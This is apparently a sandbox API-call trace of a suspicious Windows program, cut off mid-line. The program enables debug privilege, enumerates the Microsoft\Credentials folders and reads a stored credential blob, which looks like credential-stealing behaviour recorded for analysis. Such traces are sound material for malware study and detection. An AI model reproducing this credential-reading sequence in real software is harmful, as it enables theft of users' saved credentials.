[0149.919] GetProcessHeap () returned 0x690000 [0149.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x6aebe0 [0149.919] GetProcessHeap () returned 0x690000 [0149.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ad270 [0149.920] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0149.920] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6ad270 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0149.921] GetProcessHeap () returned 0x690000 [0149.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6af418 [0149.921] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0149.922] wvsprintfW (in: param_1=0x6af418, param_2="%s\\%s", arglist=0x19f9e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0149.922] GetProcessHeap () returned 0x690000 [0149.922] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5c) returned 0x6acb98 [0149.922] GetProcessHeap () returned 0x690000 [0149.923] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 [0149.923] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0149.923] GetProcessHeap () returned 0x690000 [0149.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f50) returned 0x6af418 [0149.924] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0149.925] wvsprintfW (in: param_1=0x6af418, param_2="%s\\%s.%s", arglist=0x19f9f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 55 [0149.925] GetProcessHeap () returned 0x690000 [0149.925] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x72) returned 0x6a75f0 [0149.925] GetProcessHeap () returned 0x690000 [0149.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 [0149.926] GetProcessHeap () returned 0x690000 [0149.926] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6acb98 | out: hHeap=0x690000) returned 1 [0149.926] GetProcessHeap () returned 0x690000 [0149.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad270 | out: hHeap=0x690000) returned 1 [0149.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0149.929] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 0 [0149.929] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0149.930] SetFilePointer (in: hFile=0x240, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.932] WriteFile (in: hFile=0x240, lpBuffer=0x19fbbc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19fb80, lpOverlapped=0x0 | out: lpBuffer=0x19fbbc*, lpNumberOfBytesWritten=0x19fb80*=0x1, lpOverlapped=0x0) returned 1 [0149.933] CloseHandle (hObject=0x240) returned 1 [0149.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.936] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb9c, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fba4 | out: pSid=0x19fba4*=0x6aeb38*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0149.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.937] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x6aeb38*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fba8 | out: IsMember=0x19fba8) returned 1 [0149.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.939] GetCurrentProcess () returned 0xffffffff [0149.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.940] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x19fba4 | out: TokenHandle=0x19fba4*=0x248) returned 1 [0149.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.941] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19fb9c | out: lpLuid=0x19fb9c*(LowPart=0x14, HighPart=0)) returned 1 [0149.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0149.948] AdjustTokenPrivileges (in: TokenHandle=0x248, DisableAllPrivileges=0, NewState=0x19fb8c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0149.949] CloseHandle (hObject=0x248) returned 1 [0149.949] GetProcessHeap () returned 0x690000 [0149.949] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ad270 [0149.950] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0149.950] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6ad270 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0149.950] GetProcessHeap () returned 0x690000 [0149.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f70) returned 0x6af418 [0149.951] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0149.966] wvsprintfW (in: param_1=0x6af418, param_2="%s\\Microsoft\\Credentials", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 59 [0149.966] GetProcessHeap () returned 0x690000 [0149.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6aa530 [0149.966] GetProcessHeap () returned 0x690000 [0149.966] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 [0149.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0149.967] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 1 [0149.968] GetProcessHeap () returned 0x690000 [0149.968] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad270 | out: hHeap=0x690000) returned 1 [0149.969] Sleep (dwMilliseconds=0xa) [0150.003] GetProcessHeap () returned 0x690000 [0150.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f48) returned 0x6af418 [0150.004] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.005] wvsprintfW (in: param_1=0x6af418, param_2="%s\\*", arglist=0x19f904 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0150.005] GetProcessHeap () returned 0x690000 [0150.005] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7e) returned 0x6aa5b8 [0150.005] GetProcessHeap () returned 0x690000 [0150.005] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 [0150.006] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69d5e8 [0150.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.007] StrStrW (lpFirst=".", lpSrch="Windows") returned 0x0 [0150.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.009] StrStrW (lpFirst=".", lpSrch="Program Files") returned 0x0 [0150.009] FindNextFileW (in: hFindFile=0x69d5e8, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.010] StrStrW (lpFirst="..", lpSrch="Windows") returned 0x0 [0150.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.011] StrStrW (lpFirst="..", lpSrch="Program Files") returned 0x0 [0150.012] FindNextFileW (in: hFindFile=0x69d5e8, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0150.012] FindClose (in: hFindFile=0x69d5e8 | out: hFindFile=0x69d5e8) returned 1 [0150.012] GetProcessHeap () returned 0x690000 [0150.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa5b8 | out: hHeap=0x690000) returned 1 [0150.013] GetProcessHeap () returned 0x690000 [0150.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6af418 [0150.013] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.014] wvsprintfW (in: param_1=0x6af418, param_2="%s\\%s", arglist=0x19f900 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0150.014] GetProcessHeap () returned 0x690000 [0150.014] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7e) returned 0x6aa5b8 [0150.014] GetProcessHeap () returned 0x690000 [0150.015] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 [0150.015] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69d028 [0150.015] FindNextFileW (in: hFindFile=0x69d028, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.016] FindNextFileW (in: hFindFile=0x69d028, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0150.016] FindClose (in: hFindFile=0x69d028 | out: hFindFile=0x69d028) returned 1 [0150.016] GetProcessHeap () returned 0x690000 [0150.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa5b8 | out: hHeap=0x690000) returned 1 [0150.017] GetProcessHeap () returned 0x690000 [0150.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0150.017] GetProcessHeap () returned 0x690000 [0150.017] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ad270 [0150.018] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0150.018] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6ad270 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0150.019] GetProcessHeap () returned 0x690000 [0150.019] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f70) returned 0x6af418 [0150.019] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.020] wvsprintfW (in: param_1=0x6af418, param_2="%s\\Microsoft\\Credentials", arglist=0x19fb68 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials") returned 57 [0150.020] GetProcessHeap () returned 0x690000 [0150.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x76) returned 0x6a73f0 [0150.020] GetProcessHeap () returned 0x690000 [0150.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 [0150.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.021] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials") returned 1 [0150.022] GetProcessHeap () returned 0x690000 [0150.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad270 | out: hHeap=0x690000) returned 1 [0150.023] Sleep (dwMilliseconds=0xa) [0150.036] GetProcessHeap () returned 0x690000 [0150.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f48) returned 0x6af418 [0150.037] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.038] wvsprintfW (in: param_1=0x6af418, param_2="%s\\*", arglist=0x19f8ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*") returned 59 [0150.038] GetProcessHeap () returned 0x690000 [0150.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6aa530 [0150.038] GetProcessHeap () returned 0x690000 [0150.038] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 [0150.039] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\*"), lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69d2a8 [0150.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.040] StrStrW (lpFirst=".", lpSrch="Windows") returned 0x0 [0150.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.041] StrStrW (lpFirst=".", lpSrch="Program Files") returned 0x0 [0150.042] FindNextFileW (in: hFindFile=0x69d2a8, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.043] StrStrW (lpFirst="..", lpSrch="Windows") returned 0x0 [0150.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.043] StrStrW (lpFirst="..", lpSrch="Program Files") returned 0x0 [0150.044] FindNextFileW (in: hFindFile=0x69d2a8, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0150.044] FindNextFileW (in: hFindFile=0x69d2a8, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 0 [0150.044] FindClose (in: hFindFile=0x69d2a8 | out: hFindFile=0x69d2a8) returned 1 [0150.044] GetProcessHeap () returned 0x690000 [0150.045] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0150.045] GetProcessHeap () returned 0x690000 [0150.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6af418 [0150.046] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.046] wvsprintfW (in: param_1=0x6af418, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*") returned 59 [0150.046] GetProcessHeap () returned 0x690000 [0150.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6aa530 [0150.046] GetProcessHeap () returned 0x690000 [0150.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 [0150.050] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\*"), lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69d5e8 [0150.051] FindNextFileW (in: hFindFile=0x69d5e8, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.051] FindNextFileW (in: hFindFile=0x69d5e8, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0150.051] GetProcessHeap () returned 0x690000 [0150.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6af418 [0150.052] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.052] wvsprintfW (in: param_1=0x6af418, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D") returned 90 [0150.052] GetProcessHeap () returned 0x690000 [0150.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb8) returned 0x6aa5b8 [0150.052] GetProcessHeap () returned 0x690000 [0150.053] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 [0150.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.054] StrStrW (lpFirst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", lpSrch="_dec") returned 0x0 [0150.054] GetProcessHeap () returned 0x690000 [0150.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4c) returned 0x6af418 [0150.055] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.055] wvsprintfW (in: param_1=0x6af418, param_2="%s_dec", arglist=0x19f670 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D_dec") returned 94 [0150.055] GetProcessHeap () returned 0x690000 [0150.055] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc0) returned 0x6ac678 [0150.056] GetProcessHeap () returned 0x690000 [0150.056] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 [0150.056] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\dfbe70a7e5cc19a398ebf1b96859ce5d"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0150.057] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x19f654 | out: lpFileSizeHigh=0x19f654*=0x0) returned 0x2ac0 [0150.058] VirtualAlloc (lpAddress=0x0, dwSize=0x2ac0, flAllocationType=0x1000, flProtect=0x4) returned 0x1f0000 [0150.059] ReadFile (in: hFile=0x24c, lpBuffer=0x1f0000, nNumberOfBytesToRead=0x2ac0, lpNumberOfBytesRead=0x19f650, lpOverlapped=0x0 | out: lpBuffer=0x1f0000*, lpNumberOfBytesRead=0x19f650*=0x2ac0, lpOverlapped=0x0) returned 1 [0150.060] CloseHandle (hObject=0x24c) returned 1 [0150.061] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.062] GetProcessHeap () returned 0x690000 [0150.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac678 | out: hHeap=0x690000) returned 1 [0150.062] GetProcessHeap () returned 0x690000 [0150.063] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa5b8 | out: hHeap=0x690000) returned 1 [0150.063] FindNextFileW (in: hFindFile=0x69d5e8, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 0 [0150.063] FindClose (in: hFindFile=0x69d5e8 | out: hFindFile=0x69d5e8) returned 1 [0150.063] GetProcessHeap () returned 0x690000 [0150.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0150.064] GetProcessHeap () returned 0x690000 [0150.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a73f0 | out: hHeap=0x690000) returned 1 [0150.064] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck")) returned 1 [0150.066] GetProcessHeap () returned 0x690000 [0150.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a75f0 | out: hHeap=0x690000) returned 1 [0150.066] GetProcessHeap () returned 0x690000 [0150.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1388) returned 0x6af418 [0150.066] GetProcessHeap () returned 0x690000 [0150.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x6aeb68 [0150.066] GetProcessHeap () returned 0x690000 [0150.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x11c) returned 0x6aa530 [0150.067] RtlGetVersion (in: lpVersionInformation=0x6aa530 | out: lpVersionInformation=0x6aa530*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0150.067] GetProcessHeap () returned 0x690000 [0150.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0150.068] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb18 | out: lpSystemTimeAsFileTime=0x19fb18*(dwLowDateTime=0xc6aa0291, dwHighDateTime=0x1d86053)) [0150.068] GetProcessHeap () returned 